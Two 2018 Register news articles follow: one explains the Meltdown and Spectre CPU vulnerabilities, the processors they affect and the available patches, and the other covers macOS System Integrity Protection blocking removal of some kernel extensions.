On Wednesday, following research by a sizable collection of boffins, details of three closely related vulnerabilities involving the abuse of speculative execution in modern CPUs were made public:

  • CVE-2017-5753: Known as Variant 1, a bounds check bypass
  • CVE-2017-5715: Known as Variant 2, branch target injection
  • CVE-2017-5754: Known as Variant 3, rogue data cache load

These have been helpfully grouped into two logo’d and branded vulnerabilities: Meltdown (Variant 3), and Spectre (Variants 1 and 2). Both links go to a website with the full technical papers detailing the attacks if you want to see in gory detail how they work.

There is also a Google Project Zero blog post going over the finer points. Finally, here’s some proof-of-concept exploit code that runs on Windows.

Here’s a summary of the two branded bugs:

  • Meltdown
    • This is the big bug reported on Tuesday.
    • It can be exploited by normal programs to read the contents of private kernel memory.
    • It affects potentially all out-of-order execution Intel processors since 1995, except Itanium and pre-2013 Atoms. It definitely affects out-of-order x86-64 Intel CPUs since 2011. There are workaround patches to kill off this vulnerability available now for Windows, and for Linux. Apple’s macOS has been patched since version 10.13.2. Installing and enabling the latest updates for your OS should bring in the fixes. You should go for it. If you’re a Windows Insider user, you’re likely already patched. Windows Server admins must enable the kernel-user space splitting feature once it is installed; it’s not on by default.
    • Amazon has updated its AWS Linux guest kernels to protect customers against Meltdown. Google recommends its cloud users apply necessary patches and reboot their virtual machines. Microsoft is deploying fixes to Azure. If you’re using a public cloud provider, check them out for security updates.
    • The workarounds move the operating system kernel into a separate virtual memory space. On Linux, this is known as Kernel Page Table Isolation, or KPTI, and it can be enabled or disabled during boot up. You may experience a performance hit, depending on your processor model and the type of software you are running. If you are a casual desktop user or gamer, you shouldn’t notice. If you are hitting storage, slamming the network, or just making a lot of rapid-fire kernel system calls, you will notice a slowdown. Your mileage may vary.
    • It also affects Arm Cortex-A75 cores. Qualcomm’s upcoming Snapdragon 845 is an example part that uses the A75. There are Linux kernel KPTI patches available to mitigate this. The performance hit isn’t known, but expected to be minimal.
    • Additionally, Cortex-A15, Cortex-A57 and Cortex-A72 cores suffer from a variant of Meltdown: protected system registers can be accessed, rather than kernel memory, by user processes. Arm has a detailed white paper and product table, here, describing all its vulnerable cores, the risks, and mitigations.
    • Meltdown does not affect any AMD processors.
    • Googlers confirmed an Intel Haswell Xeon CPU would allow a normal user program to read kernel memory.
    • It was discovered and reported by three independent teams: Jann Horn (Google Project Zero); Werner Haas, Thomas Prescher (Cyberus Technology); and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology).
  • Spectre
    • Spectre allows, among other things, user-mode applications to extract information from other processes running on the same system. Alternatively, it can be used by code to extract information from its own process. Imagine malicious JavaScript in a webpage churning away using Spectre bugs to extract login cookies for other sites from the browser’s memory.
    • It is a very messy vulnerability that is hard to patch, but is also tricky to exploit. It’s hard to patch because just installing the aforementioned KPTI features is pointless on most platforms – you must recompile your software with countermeasures to avoid it being attacked by other programs, or wait for a chipset microcode upgrade. There are no solid Spectre fixes available yet for Intel and AMD parts.
    • In terms of Intel, Googlers have found that Haswell Xeon CPUs allow user processes to access arbitrary memory; the proof-of-concept worked just within one process, though. More importantly, the Haswell Xeon also allowed a user-mode program to read kernel memory within a 4GB range on a standard Linux install.
    • This is where it gets really icky. It is possible for an administrative user within a guest virtual machine on KVM to read the host server’s kernel memory in certain conditions. According to Google:

      When running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel running on the host, [an attacker] can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM.

    • AMD insists its processors are practically immune to Variant 2 Spectre attacks. As for Variant 1, you’ll have to wait for microcode updates or recompile your software with forthcoming countermeasures described in the technical paper on the Spectre website.
    • The researchers say AMD’s Ryzen family is affected by Spectre. Googlers have confirmed AMD FX and AMD Pro cores can allow arbitrary data to be obtained by a user process; the proof-of-concept worked just within one process, though. An AMD Pro running Linux in a non-default configuration – the BPF JIT is enabled – also lets a normal user process read from 4GB of kernel virtual memory.
    • For Arm, Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72, Cortex-A73, and Cortex-A75 cores are affected by Spectre. Bear in mind Cortex-R series cores are for very specific and tightly controlled embedded environments, and are super unlikely to run untrusted code. To patch for Arm, apply the aforementioned KPTI fixes to your kernel, and/or recompile your code with new defenses described in the above-linked white paper.
    • Googlers confirmed that an Arm Cortex-A57 could be exploited to read arbitrary data from memory via cache sniffing; the proof-of-concept worked just within one process, though. Google is confident ARM-powered Android devices running the latest security updates are protected due to measures to thwart exploitation attempts – specifically, access to high-precision timers needed in attacks is restricted. Further security patches, mitigations and updates for Google’s products – including Chrome and ChromeOS – are listed here.
    • Discovered and reported by these separate teams: Jann Horn (Google Project Zero); and Paul Kocher in collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61).

We’re told Intel, AMD and Arm were warned of these security holes back in June last year. Our advice is to sit tight, install OS and firmware security updates as soon as you can, don’t run untrusted code, and consider turning on site isolation in your browser (Chrome, Firefox) to thwart malicious webpages trying to leverage these design flaws to steal session cookies from the browser process.

If you are using the Xen hypervisor, you should grab security patches now. Intel and AMD processors are affected, and they’re still checking whether Arm is.

“Xen guests may be able to infer the contents of arbitrary host memory, including memory assigned to other guests,” due to these processor security holes, according to the hypervisor project team.

If you’ve experienced a mass reboot – or are scheduled for one – by your public cloud provider, this’ll be why. Xen needs patching.

Meanwhile, VMware’s ESXi, Workstation and Fusion hypervisors need patching to counteract the underlying hardware design flaws.

Finally, if you are of the opinion that us media types are being hysterical about this design blunder, check this out: CERT recommends throwing away your CPU and buying a non-vulnerable one to truly fix the issue. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/04/intel_amd_arm_cpu_vulnerability/

Apple macOS so secure some apps can’t be easily deleted

An Apple macOS security process called System Integrity Protection can prevent certain apps from being easily uninstalled, which isn’t ideal when the code may be vulnerable or malware.

System Integrity Protection, or SIP, has clear benefits for macOS security. Introduced in OS X El Capitan (10.11) in 2015, it applied a new security policy to every process running on the system.

SIP attempts to ensure that system binaries can only be modified by Apple’s Software Update mechanism or by the app installer if the code is an Apple signed package. It also attempts to prevent runtime attachments and code injection.

Apart from past bugs, SIP – also referred to as “rootless” because of the attribute text used to designate SIP protection – has generally improved macOS security.

Because Apple’s app sandboxing and app guidelines already prevent such behavior for apps distributed through the macOS App Store, SIP’s primary impact has been on third-party developers distributing their apps outside of Apple’s oversight.

Permissionless app distribution isn’t possible on iOS without jailbreaking, but on macOS, developers can still distribute code without Apple’s blessing, though signing apps with a valid developer identity helps.

The macOS app BlueStacks, which allows Android apps to run on Apple systems, is an example of an app that needs to operate outside of Apple’s control because it installs a kernel extension (KEXT) to augment the capabilities of the macOS kernel.

And thanks to SIP, the app’s KEXT resists deinstallation.

Howard Oakley, a former MacUser writer, analyzed the problem in a blog post on Tuesday, describing SIP in macOS High Sierra as “broken.”

That may be something of an overstatement. In an email to The Register, Patrick Wardle, chief security researcher at Synack, a computer security biz, said, “I don’t think it’s a security issue per se; rather just an annoyance.”

High Sierra, Oakley explains, provides a new authorization mechanism for third-party kernel extensions, which Apple calls User-Approved Kernel Extension Loading. It blocks third-party kernel extensions from loading until the user explicitly grants permission through the Security & Privacy control panel.

Once the user authorizes the KEXT, Oakley says, High Sierra rolls it into a non-executable stub app that gets installed in /Library/StagedExtensions/Applications, where it gains protection from SIP through the addition of an extended attribute (xattr), com.apple.rootless.

Why is this “broken”? Simply put, Apple’s security model allows the installation of software but not its removal, at least without jumping through some hoops.

Removal is possible if you restart in Recovery mode and disable SIP on the volume in question, after which the lingering stub app can be removed. But it’s not easy.

Oakley’s concern is that users may be duped into authorizing the installation of malicious code, thereby allowing it to hide behind SIP protection, which would make the malware difficult to dislodge.

That’s worthy of some concern, though a careless user is arguably more dangerous than an awkward security mechanism.

What may be more troubling is seeing macOS flirt with a locked-down security model like that of iOS, where the answer to a user’s command is, “I’m sorry, Dave. I’m afraid I can’t do that.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/03/apple_macos_sip/